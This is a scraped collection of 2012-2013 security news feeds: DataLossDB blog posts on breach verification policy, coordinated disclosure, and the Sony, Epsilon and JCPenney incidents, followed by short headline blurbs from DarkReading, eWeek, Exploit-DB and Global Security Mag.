And ZDNet is certainly not the only media source to believe a hacker's claims that were subsequently determined to be totally untrue. We've been fooled, too, at times, as has Lee Johnstone, who recently had to correct a report on Cyber War News that a hacker named Hannibal had leaked 1,000,000 Facebook account details in retaliation for #OpIsrael. Over the past year, the problem of false claims has reached almost epidemic proportions, which is why, over the past few months, DataLossDB.org started implementing policies requiring us to obtain, or at least make a good-faith effort to obtain when possible, a statement from an allegedly breached entity either confirming, denying, or clarifying and correcting a hacker's claims of a breach - *before* we decide whether to add a report to the database. Sometimes, as in this case, it is relatively easy to reach a media contact and get a response. In other cases, particularly with small entities involved in claimed hacks overseas, it is not so easy, and we may send several e-mails that go unanswered before we try to decide whether to include a claimed breach or not. If you log in and read individual entries, you may even see a Curator's Note in the Comments section indicating that we tried and failed to reach anyone by e-mail to confirm the report. Deciding whether to include a report when we cannot reach anyone is headache-inducing, to say the least, as we realize that with this less-than-perfect system, entities might suffer reputation harm through no fault of their own. We have therefore also implemented the ability to fully delete entries from the database should we later learn that a claim was totally false. Another policy we recently implemented involves putting (DISPUTED) in the summary line for an incident if there is a real dispute as to whether a breach occurred or not.
There may be times when an entity insists they have not been breached but we find the evidence in a data dump to be compelling and decide to include the report. This was the case, for example, in the reported hack of MilitarySingles.com, where they denied it to DataBreaches.net and others, but analysis of the data dump and information still available on their site led us to the decision to include the report. At other times, a reported breach may be part of litigation and, where the defendant denies the claims, we may decide to include the report but note it as DISPUTED. Trying to confirm the numerous claimed hacks that appear on Pastebin or other sites on a daily basis is a time-consuming process that slows us down in providing timely reports and has put even more pressure on our resources, which are already constrained. However, we believe that it needs to be done to ensure data quality. And so, as 2012 draws to a close, we have already added over 1,400 incidents (and that number does not include the Fringe incidents) for the year, but there are hundreds more still to process. Whatever number you see on the Stats page for December 31st will likely be significantly under our real total for the year until we can catch up. On that note, I wish you all a Happy and Healthy 2013. And let's hope that next year, things slow down for us! /Dissent

==> Is A Data Breach A Life Or Death Situation?

http://datalossdb.org/incident_highlights.rss Most people would agree that security is important; however, many would have a hard time saying that a data breach could be a life or death situation. Sadly, in the past few weeks there have been two cases in the news that may qualify for that characterization. The first case is the data breach at King Edward VII Hospital on December 4, 2012. Two Australian radio show hosts prank called the hospital in a joking attempt to get information on the condition of the Duchess of Cambridge. To their surprise, the nurse who answered the phone fell for the hoax and provided them with information on the Duchess's condition and care. Last Friday, Jacintha Saldanha, the 46-year-old nurse who provided the information, committed suicide just two days after news of the breach was released. The second case involves a data breach that occurred September 28, 2012 at the University of Georgia. A former student gained unauthorized access to a server containing 8,500 former and current employees' names, Social Security numbers, and other sensitive information. With the investigation still in progress, police announced on Tuesday that Charles Stapler Stell, the 26-year-old behind the data breach, passed away with no indication of foul play, most likely as the result of suicide. In these two cases, the data breaches and their consequences appear to have pushed these individuals into a life or death decision. As the importance of privacy and security breaches increases, we have now seen that there are potential ramifications for the people involved beyond notification and credit monitoring. As breaches unfortunately become more commonplace, organizations impacted should ensure that they not only have a response plan for dealing with the incident, but also for how to constructively handle any employees at fault.
While discipline from HR may be on the agenda, organizations need to ensure the wellbeing of their employees as they process their actions.
References:
http://www.bizjournals.com/atlanta/news/2012/12/11/uga-dead-former-student-responsible.html
http://www.telegraph.co.uk/news/9730305/Statement-from-the-King-Edward-VIIs-Hospital-on-the-death-of-nurse-Jacintha-Saldanha.html

==> Behind the scenes of doing the right thing

http://datalossdb.org/incident_highlights.rss From time to time, the Open Security Foundation is contacted about security vulnerabilities and data breaches that have yet to be made public. We always strive to handle each report in the most appropriate way possible and wanted to share with you an example from last year. In March of 2011, we had a breach anonymously submitted to DataLossDB without any further way to contact the submitter, but with enough information for us to work on verifying and relaying the issue to the affected company. From the initial look of things, it appeared that job applicants' names, addresses, phone numbers, email addresses, and resumes were accessible and even editable on the Computer Sciences Corp (CSC) website without requiring a login. You could browse to their resume website and increment the ResumeID=x field in the URL, making it trivial to enumerate and access approximately 300 applicants' personal information. We contacted CSC as soon as the incident was submitted to see if they would speak to us or at least provide a response. At first it appeared that they ignored our emails, and we were getting a bit concerned as several days went by without a response. However, once we escalated to a phone call, we were able to discuss the issue with the proper contacts and the vulnerability was fixed within 48 hours. We also spoke with their lawyer, who stated that they would notify those affected and get back to us with a statement. Here is the statement from CSC:

---------------------- Original Message ----------------------
Last month, CSC was contacted by Open Security Foundation ("OSF") who had received an anonymous tip that an Internet-accessible Web site CSC had set up for a recruiting effort had security issues.
Upon internal investigation, it was determined that the site created in 2006 was unintentionally architected in such a way as to allow for URL manipulation once a person created a profile for themselves, giving them the ability to see other persons' resume information. CSC has no evidence that anyone other than the original anonymous tipster and those associated with OSF actually had access to resume information. This site was not properly de-provisioned and remained accessible until 2011 (although the last resume received was in September 2010). The contents, however, were not indexed or searchable by Google. There were approximately 300 profiles created with varying amounts of personal information provided. Although CSC did not ask for or require birth dates or Social Security Numbers, eight people provided either one or both. One person provided the last four digits of a SSN. CSC will provide formal notification as required by state law. In addition, where there is no state requirement, CSC will nonetheless send letters to inform everyone about the vulnerability.

Due to our delay, we have just now pushed this incident live and wanted to thank the anonymous submitter for providing us the information so we could responsibly report it, and CSC for responding to the breach appropriately. To be clear, after we spoke with CSC on the phone and were able to get connected to the right people, they responded promptly, did a thorough investigation, and then, to our knowledge, notified everyone. Our delay in posting this update and pushing the incident live is in no way an indication one way or the other about CSC. In fact, it just highlights the continued challenge for the Open Security Foundation to keep up with the massive number of breaches that continue to occur every day. In addition, we thought we would post this particular example to share some of the work that happens behind the scenes at OSF, which many people would never know exists. Coordinating with organizations such as this can take a great deal of time and patience on both sides. Whenever possible and practical we do go out of our way to alert entities to breaches, but at other times we unfortunately just have to post the breach. We would love to contact all entities to confirm they are aware of the incident and offer assistance, but this is not possible. For example, while we may do so from time to time, we don't typically contact organizations for breaches when the data is posted publicly, such as when information is dumped to Pastebin or other paste sites. Unfortunately, we do not have sufficient staff to always do that, and some sites do not make it easy to contact them. We would love to be able to do more with the project, but unfortunately just have not been able to get the support or volunteers required. Moving forward, we will be making changes to the project to help ensure its future. This will begin with a new partnership with Risk Based Security, which will be able to bring more resources to better support the project and continue our research.

==> Sony had HOW many breaches?

http://datalossdb.org/incident_highlights.rss We thought keeping track of entities involved in the Epsilon breach was tough, but the recent spate of attacks on Sony networks has us working overtime trying to update the database. Thankfully, Jericho provided yeoman service and compiled a hyperlinked chronology of recent developments. The Sony breaches have generated a lot of discussion. Some of it has centered on Sony's shocking failure to encrypt passwords and it being all-too-vulnerable to SQLi compromises (if those posting the data publicly are accurate as to how they compromised certain databases). Sony undoubtedly has a lot of explaining to do if it hopes to have future assertions of industry-standard security taken seriously. To date, the two largest incidents affected over 100 million records. But were the PSN and Sony Online Entertainment (SOE) attacks two separate incidents or were they really one breach? Should DataLossDB.org have recorded one breach with over 100 million affected, or two incidents involving 77 million and 24.6 million, respectively? Or should we just treat the last 45 days' incidents as one #EPIC #FAIL and one big incident? In light of our mission to track unique breaches, the question is not trivial. When news of the second incident broke, the first thought was to update the PSN entry and add another 24.6 million to that counter. But as more details emerged, it seemed clear that we should treat it as a separate incident. The attack had occurred on different days than the PSN attack, the data compromised were on different networks, it seems quite likely the different networks had different security measures involved (Sony later testified that databases with credit card data were treated with higher security), we did not know if the same individuals were involved in both attacks, and the company itself was reporting it as a second incident previously unknown to them and not as an update to the other breach. 
Our impression that these were two unique incidents was subsequently supported by the reports made to the New Hampshire Attorney General's Office for each incident (here and here). Despite what we thought was an accurate way to track these breaches, one commenter to DataLossDB.org questioned our decision to treat the reports as two unique incidents. A researcher with Javelin Strategy commented that treating this as two incidents instead of one benefited Sony: they would not appear ranked 2nd in our list of all-time largest breaches on our home page. Since these incidents had the same parent corporation, he suggested, they should be treated as one aggregated incident. While those points may appear reasonable to some, we find them unpersuasive. First, we do not make decisions based on whether an entity benefits or suffers from a particular decision. We make decisions based on whether the available information supports aggregating the data for a particular incident or not. In this case, although it is the same parent corporation, the available information does not support aggregation. In other cases, such as a Wellpoint breach that was initially entered as distinct incidents, when my research revealed that there was only one incident and that what appeared to be a second incident was really due to Wellpoint's vendor not fully securing the web sites after the first report, I recommended that those incidents be combined, and they will be. But other than a common target - Sony - where is there any evidence that this was just one incident? There is none. We recognize that not everyone will agree with our decision, and that's fine. Should new information become available that suggests that a one-incident approach is more appropriate for these incidents, we will edit our entries. As always, we welcome constructive thoughts about how to make the database more useful to stakeholders, but we do not expect all of our decisions to please everyone.

==> Epsilon Bingo

http://datalossdb.org/incident_highlights.rss By now, everyone has probably read about a company named Epsilon. In fact, most people likely have second-hand involvement, having received one or more emails from companies you do business with warning you to be very careful after a recent incident. Most of these companies have used a similar form letter explaining the concerns and that you should be "cautious of phishing e-mails, where the sender tries to trick the recipient into disclosing confidential or personal information." These notifications stem from Epsilon, a managed e-mail broadcasting company, getting compromised and having all of their customer e-mail addresses copied. We have received a few emails from people asking us how we could have missed the Epsilon breach and why it isn't on our site. Well, it actually is on the site, as we do follow incidents such as this; however, it is listed as a Fringe incident. Why Fringe? From what we can tell so far, the breach (while unacceptable) is contained to Names and Email Addresses. We do recognize that this information may increase the risk to customers, as targeted spearphishing attempts may be more successful; however, there is no loss of PII. We have debated this topic for years, and instead of not including them in DataLossDB, they are now just labeled Fringe. There will be more debate on the severity of this incident for sure. Some think it is critical and others merely say that their email address was never meant to be private anyway. There are good arguments supporting both sides of the debate. We will be continuing to add all of the affected organizations as we learn about them, and you can see the incident here: http://datalossdb.org/incidents/3540 When Epsilon posted the notice on their site they mentioned: "On March 30th, an incident was detected where a subset of Epsilon clients' customer data were exposed by an unauthorized entry into Epsilon's email system."
As of April 4th, they have updated the definition of subset to mean "The affected clients are approximately 2 percent of total clients and are a subset of clients for which Epsilon provides email services." As of today, we are aware of a little over 40 companies affected, and more notices are pouring in from users. As to how many users are impacted, that is anyone's guess. Our guess is A LOT. If you want to read some of the notices we have received, over a dozen are in our mailing list archives: http://lists.osvdb.org/pipermail/dataloss/2011-April/thread.html For those who want to play along, we have decided to make some Epsilon Bingo Cards. If you are able to fill up a whole card and prove it with the notices, we might have to give you a prize... that is the least we could do, right? As always, please keep sending us any notices that we are missing so that we may better gauge the scope of this incident and update the cards.

==> The DataLossDB project welcomes Dissent!

http://datalossdb.org/incident_highlights.rss The Open Security Foundation is pleased to announce that Dissent, the publisher and maintainer of DataBreaches.net and PHIprivacy.net, has now joined DataLossDB as a curator for the project. OSF has worked with Dissent over the years and she is already known to us as a DataLoss Archaeologist, as she took third place in our Oldest Incident contest. She found the 1984 TRW incident, where computer hackers gained access to a system holding credit histories of some 90 million people, which happens to be the 3rd largest breach of all time in DataLossDB. Her more active involvement with the project on a day-to-day basis will help us remain the most complete archive of dataloss incidents world-wide and will enhance our ability to keep current on more breaches in a timely manner. Dissent will continue to maintain her own web sites as a resource on breach news and issues. For those who do not know Dissent, she's a practicing health care professional with a special concern for health care sector breaches, and we expect to see increased coverage of medical sector breaches in the database in months to come. As Dissent notes, "With recent changes to federal laws making more information available to us about health care sector breaches, we are now beginning to get some sense of how common these breaches are and the common breach types. Including these incidents in the database will enable analyses that would not have been possible or meaningful just a few years ago." Open Security Foundation's CEO, Jake Kouns, says, "Dissent has been a supporter of DataLossDB from the very beginning and is an extremely dedicated and thorough researcher. We are extremely fortunate to have her as part of the DataLossDB team and look forward to working more closely with her." Welcome Dissent, our newest curator and resident research queen!

==> Open Security Foundation Announces New Advisory Board

http://datalossdb.org/incident_highlights.rss As security vulnerabilities and data loss incidents become a regular occurrence, the Open Security Foundation has grown from supporting a single project in 2004 to a leading provider of filtered security information, offering notification and aggregation of data on data loss and cloud security incidents. The Open Security Foundation has evolved into one of the most utilized resources for security information, and as a 501(c)(3) non-profit organization relies heavily on public contributions, volunteer effort and corporate sponsorships. The growing demand for information to support proper risk management has led to additional projects and now to the introduction of an advisory board of industry professionals who will lend their expertise to keep OSF moving in a positive direction and to be the first line of access for all who require its services. Open Security Foundation CEO and founder Jake Kouns stated, "This is a very important step in shaping the future of the Open Security Foundation. OSF has reached a point in its growth that requires a strategic move to provide longevity and sustainability. It has always been a goal of this organization to provide our work to the broadest audience, and the introduction of the advisory board will contribute to that objective. I am extremely proud to be part of such an amazing organization that has built a reputation of excellence and serves a very important function," adds Kouns. We put out a call for qualified individuals who could provide guidance and insight to keep OSF a leader in the security information arena. The results of our search far exceeded our highest expectations; they not only give us confidence in our direction, but also show the impact OSF has had on the industry. The new advisory board members come from an array of industries that understand the importance of OSF's resources.
Each member was chosen for a specific contribution toward achieving the objective and mission of this foundation, and each is capable of providing a broad-based perspective on information security, business management and fundraising. Tom Srail, Senior VP, Willis Group, provides 19 years of experience in the insurance industry with expertise in risk consulting, professional liabilities, network security risks, intellectual property and technology professional risks. Shawn Andreas, VP Marketing, Guard Dog Inc. (GRDO.PK), will contribute his 20 years of experience in marketing and brand awareness to remake OSF to be more consumer- and market-friendly, focusing on fundraising and sponsorship opportunities. His expertise in marketing spans diverse markets and includes work with some of the country's top companies, including GM, Apple, Viacom and more. Jim Hietala, VP, Security for a leading IT standards organization, manages all security and risk management programs. Mr. Hietala is a frequent speaker at industry conferences; in addition, he has published numerous articles on information security, risk management and compliance topics. Daniel E. Geer, Jr., Sc.D., Chief Information Security Officer, In-Q-Tel, Washington. Mr. Geer has a list of accomplishments including participation in government advisory roles for the Federal Trade Commission, the Departments of Justice and Treasury, the National Academy of Sciences, the National Science Foundation, the US Secret Service, the Department of Homeland Security, and the Commonwealth of Massachusetts. Andrew Lewman, Executive Director, The Tor Project, Inc. Andrew Lewman is the Executive Director of The Tor Project, a non-profit organization. Mr. Lewman has worked on projects with the National Science Foundation, Internews Network, Freedom House, Google, the Broadcasting Board of Governors, the National Network to End Domestic Violence, and the US State Department.
In addition to the advisory board, OSF also announces new leadership positions within the organization. We are pleased to announce that Becky Chickering and Corey Quinn are now curators for the DataLossDB project. We want to thank everyone who contacted OSF to volunteer their time and skills for the advisory board, and for their flexibility as we went through this process. During our conversations with potential members we spoke with several passionate individuals who have a great deal to offer OSF. We plan to continue to expand our leadership team and are always looking for volunteers to help the organization.

==> Open Security Foundation Launches New Cloud Security Project

http://datalossdb.org/incident_highlights.rss The Open Security Foundation, providing independent, accurate, detailed, current, and unbiased security information to professionals around the world, announced today that it has launched Cloutage (cloutage.org), which will bring enhanced visibility and transparency to Cloud security. The name Cloutage comes from a play on two words, Cloud and Outage, that combine to describe what the new website offers: a destination for organizations to learn about cloud security issues as well as a complete list of any problems around the globe among cloud service providers. The new website is aimed at empowering organizations by providing cloud security knowledge and resources so that they may properly assess information security risks related to the cloud. Cloutage documents known and reported incidents with cloud services while also providing a one-stop shop for cloud security news and resources. "When speaking with individuals about the cloud, to this point it has been a very emotional conversation. People either love or hate the cloud," says Jake Kouns, Chairman, Open Security Foundation. "Our goal with Cloutage is to bring grounded data and facts to the conversation so we can have more meaningful discussions about the risks and how to improve cloud security controls." Cloutage captures data about incidents affecting cloud services in several forms, including vulnerabilities that affect the confidentiality and integrity of customer data, automatic update failures, data loss, hacks and outages that impact service availability. Data is acquired from verifiable media resources and is also open for community participation based on anonymous user submissions. Cloud solution providers are listed on the website and the community can provide comments and ratings based on their experiences. Cloutage also features an extensive news service, mailing lists and links to organizations focused on the secure advancement of cloud computing.
"The nebulous world of cloud computing and the security concerns associated with it confuses many people, even IT and security professionals," says Patrick McDonald, a volunteer on the Cloutage project. "We want a clearinghouse of information that provides a clear picture of the cloud security issues."

==> JCPenney has dodged a huge bullet... until now.

http://datalossdb.org/incident_highlights.rss Now being reported in the mainstream media, JCPenney was "Company A" in the recently infamous Albert Gonzalez trial. In court filings, we found some attachments that seem to have been a convincing factor in the judge's decision to unseal the identity of "Company A", a.k.a. JCPenney. JCP fought hard to keep its identity concealed, but ultimately it would seem that these attachments, as well as some reporting by Evan Schuman, made the difference. Attachment A, filed in document 14 of the case (for those following the case on PACER, etc.), shows ICQ chat extracts where Gonzalez and a co-conspirator discuss JCPenney. It is damning from a security professional's point of view. It would seem almost irrefutable that JCPenney was compromised. How many cards were stolen is unknown, but cards were almost undoubtedly stolen, and JCPenney has (until now) seemingly dodged a huge public relations bullet. Below is a snippet from the attachment:

* Gonzalez: "what did hacker 2 say about jcp?"
* Conspirator: "he hacked 100+ sqls inside and stopped"
* Gonzalez: "hacker 2 told me he found a place to snif for dumps in jcp"
* Gonzalez: "i see, hacker 2 showed you anything?"

Gonzalez then posts what appear to be names and credit card details (redacted in the court docs). They then go on to talk about how one of the conspirators had "domain admin" access, suggesting that they pretty much had control of everything in the given network (depending on topology and segregation). We struggled with a possible JCPenney incident before reading this document. We initially categorized it as "fringe", but it seems pretty obvious at this point that JCPenney was either: 1) just hacked, or 2) hacked badly enough to expose card data. But judge for yourself: here's the attachment and the full PDF we obtained (including the attachment) for context.
If you use these, please credit the Open Security Foundation for buying these and making them public -- you don't have to as they are public record, but we did have to pay for them, so we'd appreciate the credit!

==> The Great Lie of Compliance

http://www.darkreading.com/rss/all.xml If you believe you are fully compliant, then you are not

==> Ponemon Prognosis Shows State of Cloud Security Improvements

http://www.darkreading.com/rss/all.xml Incremental improvements in risk assessments and data protection in the cloud, but access control issues abound

==> Secure Development: Must-Do Or Money Pit?

http://www.darkreading.com/rss/all.xml At the RSA Conference, two software security specialists debate over whether the cost of secure programming is too much for most companies, recommending simple steps to improve development

==> White House Cybersecurity Czar: New Executive Order A 'Down Payment'

http://www.darkreading.com/rss/all.xml Michael Daniel says President Obama's Executive Order on Cybersecurity sets the stage for cybersecurity legislation for protecting critical infrastructure

==> BlackBerry Can Set EMM Standard With BES 10

http://www.darkreading.com/rss/all.xml The need for the BlackBerry Enterprise Server that's still in almost all large organizations has been declining, but BES 10 changes everything. Instead of being a legacy server to manage legacy phones, BES 10 can be the central console for managing all mobile devices

==> Governance Without Metrics Is Just Dogma

http://www.darkreading.com/rss/all.xml Entertaining RSA Conference panel titled 'Why U No Haz Metrics' discusses the importance of measuring security controls against exposure to loss

==> Desktops-As-A-Service Boost Security, But Beware

http://www.darkreading.com/rss/all.xml At RSA session, panelists argue that companies can better protect sensitive data and systems by using virtual desktop infrastructure, but warn that everything relies on the quality of the hypervisor

==> Using DevOps To Upgrade Application Security

http://www.darkreading.com/rss/all.xml The techniques of the DevOps movement designed to bring developers and IT operations into closer alignment for more agility can also be a huge boon for app sec, RSA panelists say

==> Sharpening Endpoint Security

http://www.darkreading.com/rss/all.xml Some tips on how to protect the most vulnerable parts of your IT infrastructure: the endpoints and the unpredictable users who control them

==> Evernote Resets Everyone's Passwords After Intrusion

http://www.darkreading.com/rss/all.xml After detecting a coordinated intrusion into their network, Evernote forced a system-wide password reset today. The attackers were able to access Evernote user information, which includes usernames, email addresses associated with Evernote accounts and encrypted passwords

==> Tale Of Two Compromises Provides Lessons For SMBs

http://www.darkreading.com/rss/all.xml The stories behind the hacking of a startup's CEO and a journalist, as told at the RSA Conference, provide small and midsize businesses with good tactics to secure their businesses

==> Researchers Solicit Sinkhole-Sharing Among Researchers

http://www.darkreading.com/rss/all.xml Dell SecureWorks researchers will provide their homegrown tools in open source to researchers from other companies and organizations

==> Cool Tech's First Showing At RSA Conference 2013

http://www.darkreading.com/rss/all.xml Meet five unsung heroes that showcased their new solutions at the RSA Conference. You may find something you didn't know you needed

==> A Vulnerability Disclosure Game Changer

http://www.darkreading.com/rss/all.xml Two new ISO standards will push third-party developers, online service providers and even hardware vendors to stop ignoring vulnerability disclosures

==> Open Public Wi-Fi: How To Stay Safe

http://www.darkreading.com/rss/all.xml One day our systems will be built to default always to secure configurations, but we're not there yet

==> Defending Local Administrator Accounts

http://www.darkreading.com/rss/all.xml One compromised desktop is usually all it takes for complete network ownership by an attacker; local admin accounts are often the mechanism for that escalation

==> 5 Lessons From The FBI Insider Threat Program

http://www.darkreading.com/rss/all.xml Finding ways to improve enterprise insider theft detection and deterrence

==> FBI Director: ID And Deter Attackers 'Behind The Keyboards'

http://www.darkreading.com/rss/all.xml Finding LulzSec's 'Sabu' a prime example of tracking down cybercriminals, official tells RSA Conference 2013 attendees

==> SCADA 'Sandbox' Tests Real-World Impact Of Cyberattacks On Critical Infrastructure

http://www.darkreading.com/rss/all.xml New testbeds would help operators test software patches as well

==> Threat Intel Disclosure for Profit, or Progress?

http://www.darkreading.com/rss/all.xml Tom Parker weighs the pros and cons of Mandiant's recent intelligence disclosure.

==> The Best Way To Spend Your Security Budget

http://www.darkreading.com/rss/all.xml One SQL injection attack can bring in big bucks. It's a no-brainer that you should make this problem top priority

==> Pentagon Unveils Secure Mobile Device Plan

http://www.darkreading.com/rss/all.xml Military releases a new plan to accelerate the adoption of mobile devices and apps for both classified and unclassified use

==> China's Cyberespionage Will Continue Unabated, Say Experts

http://www.darkreading.com/rss/all.xml The U.S. government will be slow to act against aggressors who attack through the Internet, predict policy and China experts at RSA

==> HP Launches Big Data Security Products, Threat Research

http://www.darkreading.com/rss/all.xml HP this week released new big data tools designed to provide businesses with better information security intelligence gathering capabilities, and launched a new information security research group that's been tasked with providing better threat intelligence for HP's own security products. On the big data front, HP said users of HP ArcSight's security information and event management (SIEM) can now integrate the software with the HP Autonomy IDOL content analytics engine. According to HP, "this combination automatically recognizes the context, concepts, sentiments and usage patterns related to how users interact with all forms of data," and gives businesses a new way to translate raw security data into more actionable intelligence by helping security managers better track individual users' behavior patterns and spot signs of unusual activity. To help businesses monitor more security events at once, HP also released a new HP ArcSight/Hadoop Integration Utility, which integrates HP ArcSight ESM 6.0c with Apache Hadoop, the open source data processing platform that's been driving the push toward big data. According to HP, the combination of Hadoop's large-scale data repository and ArcSight's reporting, search and correlation capabilities can be used to apply "statistical analysis, anomaly detection and predictive analytics" for security events contained in petabytes of captured data.

==> Segmentation Can Increase Risks If Firewalls Aren't Managed Well

http://www.darkreading.com/rss/all.xml The multiplication of internal firewalls to comply with regulations and minimize risk to critical databases and applications has created a rat's nest of firewall configuration issues

==> BlackBerry 10 with Enhanced Security Wins Hefty Order from Germany

http://www.eweek.com/rss-feeds-45.xml The German government plans to buy as many as 40,000 BlackBerry 10 devices that will be enhanced with security applications from SecuSmart to meet NATO standards.

==> BYOD, Virtualization Impact Enterprise Security: F5 Networks

http://www.eweek.com/rss-feeds-45.xml The security landscape continues to change rapidly and many organizations are struggling to properly address evolving threats, the survey indicated.

==> Evernote Cloud Storage Service Warns Users of Password Breach

http://www.eweek.com/rss-feeds-45.xml Unknown attackers gain access to user data and encrypted password files, prompting the online storage service to alert its subscribers of the breach.

==> Businesses Concerned About State-Sponsored Cyber Attacks

http://www.eweek.com/rss-feeds-45.xml In the wake of high-profile cyber attacks directed against U.S. companies, a survey finds half of businesses believe their organization could be a target.

==> SCADA Security Experts Call for More Public-Private Collaboration

http://www.eweek.com/rss-feeds-45.xml To tackle threats to critical infrastructure control systems, companies, academia and government need to work together and exchange information, experts say at the RSA Conference.

==> Google Offers Reminders on Preventing Identity Theft

http://www.eweek.com/rss-feeds-45.xml Identity theft is again the top consumer complaint in the U.S., according to the FTC. Google wants to remind users how they can avoid becoming victims.

==> Reanimating Botnet Domains Delivers Clues to Cold Cases

http://www.eweek.com/rss-feeds-45.xml Grabbing forgotten domains allows researchers to identify victims and gain more intelligence about botnets and nation-state espionage attacks.

==> Stuxnet Variant Origins May Stretch Back to 2005, Symantec Says

http://www.eweek.com/rss-feeds-45.xml The notorious malware at the center of the cyber-sabotage campaign that targeted Iran's nuclear program is several years older than researchers once thought.

==> McAfee Will Add Malware Sandboxing to Its Securityware

http://www.eweek.com/rss-feeds-45.xml This identifies malware, isolates it, runs it in the protected sandbox, then deletes, quarantines or holds it for further action.

==> Box Adds New Security Layer for Life Cycle of Content

http://www.eweek.com/rss-feeds-45.xml Box's new functionality better enables enterprises to manage users, devices and applications while also providing on-demand access to data analytics.

==> Juniper Launches Cloud-Based Security Intelligence Service

http://www.eweek.com/rss-feeds-45.xml Juniper's Junos Spotlight Secure service will give businesses greater insight into attackers, threats and the devices used in attacks.

==> RSA Conference: Embrace Big Data Analytics for Security, Coviello Says

http://www.eweek.com/rss-feeds-45.xml Art Coviello, executive chairman of EMC's RSA security division, says big data analytics will push organizations toward intelligence-driven security.

==> RSA: Why Big Data Presents Big Security Problems

http://www.eweek.com/rss-feeds-45.xml The security giant launches a new version of Authentication Manager; Chairman Art Coviello details threats and the opportunities that big data presents.

==> Security Worker Shortfall is Putting Organizations at Risk

http://www.eweek.com/rss-feeds-45.xml Both government agencies and the private sector need more security people. The current scarcity puts the United States at risk, say experts.

==> IT Security Organizations Facing Shortage of Skilled Professionals

http://www.eweek.com/rss-feeds-45.xml Organizations are looking for a variety of skills in job candidates, and there's an acute shortage of secure application development specialists.

==> [webapps] - Remote File Manager v1.2 iOS - Multiple Vulnerabilities

http://www.exploit-db.com/rss.php Remote File Manager v1.2 iOS - Multiple Vulnerabilities

==> [dos] - Kaspersky Internet Security 2013 - Denial Of Service Vulnerability

http://www.exploit-db.com/rss.php Kaspersky Internet Security 2013 - Denial Of Service Vulnerability

==> [local] - Viscosity setuid-set ViscosityHelper Privilege Escalation

http://www.exploit-db.com/rss.php Viscosity setuid-set ViscosityHelper Privilege Escalation

==> [local] - Setuid Tunnelblick Privilege Escalation

http://www.exploit-db.com/rss.php Setuid Tunnelblick Privilege Escalation

==> [webapps] - D-Link DSL-2740B (ADSL Router) Authentication Bypass

http://www.exploit-db.com/rss.php D-Link DSL-2740B (ADSL Router) Authentication Bypass

==> [webapps] - PHP-Fusion 7.02.05 - Multiple Vulnerabilities

http://www.exploit-db.com/rss.php PHP-Fusion 7.02.05 - Multiple Vulnerabilities

==> [webapps] - Piwigo 2.4.6 - Multiple Vulnerabilities

http://www.exploit-db.com/rss.php Piwigo 2.4.6 - Multiple Vulnerabilities

==> [webapps] - doorGets CMS - CSRF Vulnerability

http://www.exploit-db.com/rss.php doorGets CMS - CSRF Vulnerability

==> [papers] - Post XSS Exploitation: Advanced Attacks and Remedies

http://www.exploit-db.com/rss.php Post XSS Exploitation: Advanced Attacks and Remedies

==> [papers] - [Hebrew] Digital Whisper Security Magazine #40

http://www.exploit-db.com/rss.php [Hebrew] Digital Whisper Security Magazine #40

==> Check Point Reinvents Security and Compliance Monitoring

http://www.globalsecuritymag.com/spip.php?page=backend Check Point has introduced the new Check Point Compliance Software Blade, an integrated real-time compliance monitoring solution that leverages an extensive knowledge of regulatory requirements and IT security best practices. The Compliance Software Blade ensures that security policies are aligned with global regulations and validates that appropriate security levels are maintained - shortening audit times, improving security and reducing costs for businesses. The new solution is fully (...) - Product Reviews

==> Ipswitch File Transfer announces WS_FTP Server 7.6

http://www.globalsecuritymag.com/spip.php?page=backend Ipswitch File Transfer has announced the availability of its latest secure file transfer software, WS_FTP Server 7.6. The new software includes enhanced security, expanded database support and new customisation tools for simplified and secure person-to-person file transfers. New features of WS_FTP 7.6 include: Enhanced Security: WS_FTP Server 7.6 builds upon its extensive security capabilities with the ability to encrypt file transfers using the OpenSSL 1.0.1c protocol. (...) - Product Reviews

==> NaviSite Introduces NaviCloud® Intelligent Storage Vault for Enterprises

http://www.globalsecuritymag.com/spip.php?page=backend NaviSite, Inc., a Time Warner Cable Company, is a provider of enterprise-class hosting, managed application, managed messaging and managed cloud services, today announced a new backup service for enterprises as part of the NaviCloud Intelligent Storage (NCIS) suite of solutions. NCIS Vault provides companies with an advanced, on premise, data protection and storage capability with data replication to the NaviCloud platform. In a recent IDC Analyst Connection report, "Reduce Storage (...) - Product Reviews

==> Vigil@nce - TYPO3: vulnerabilities of extensions

http://www.globalsecuritymag.com/spip.php?page=backend This bulletin was written by Vigil@nce : http://vigilance.fr/offer SYNTHESIS OF THE VULNERABILITY An attacker can use several vulnerabilities of TYPO3 extensions in order to generate a Cross Site Scripting or to inject code. Impacted products: TYPO3 Severity: 2/4 Creation date: 19/02/2013 DESCRIPTION OF THE VULNERABILITY Several vulnerabilities were announced in TYPO3 extensions. An attacker can trigger an SQL injection in the CoolURI (cooluri) extension. (...) - Security Vulnerability

==> Christian Toon, Iron Mountain: Are data breaches inevitable in a digital age?

http://www.globalsecuritymag.com/spip.php?page=backend With 93 per cent of large and 76 per cent of small organisations admitting to falling foul of a security breach in the past two years, you would be forgiven for thinking that some form of data loss within business is inevitable. Indeed Iron Mountain research found that more than half (53.3 per cent) of European businesses expect to lose data. As a result, they are unprepared when it comes to protecting company information. This complacency is cause for concern. Many businesses are (...) - Opinion

==> IBM To Make Its Cloud Services and Software Open Sourced-based

http://www.globalsecuritymag.com/spip.php?page=backend IBM announced that all of its cloud services and software will be based on an open cloud architecture. This move will ensure that innovation in cloud computing is not hampered by locking businesses into proprietary islands of insecure and difficult-to-manage offerings. Without industry-wide open standards for cloud computing, businesses will not be able to fully take advantage of the opportunities associated with interconnected data, such as mobile computing and business analytics. As the (...) - Product Reviews

==> NextiraOne UK invests €1M in ‘Smart-Tasking' Managed Services

http://www.globalsecuritymag.com/spip.php?page=backend NextiraOne UK is investing €1m in its Managed Services business to strengthen its team, dramatically enhance its Managed Services solution portfolio and focus on increasingly effective service delivery that will add genuine business value for the company's customers. The investment will build on NextiraOne's highly successful Managed Services business development over the last few years and includes the recruitment of new experts and dedicated managed services consultancy expertise, plus (...) - Business News

==> UL becomes a fully appointed Common Criteria Information Technology Security Evaluation Facility (ITSEF), under the UK Scheme run by CESG

http://www.globalsecuritymag.com/spip.php?page=backend UL is pleased to announce that their UK-based laboratory has successfully completed the process to achieve Common Criteria accreditation to ISO/IEC 17025 by the UK Accreditation Service (UKAS) and full ITSEF appointment under the UK IT Security Evaluation and Certification Scheme operated by CESG. This accreditation and appointment means that UL can now undertake security evaluation to the highest level of vulnerability analysis (AVA_VAN.5). This helps their customers globally with (...) - Business News

==> SMARTRAC Launches WebLite UHF RFID Tag for Retail EPC Programs

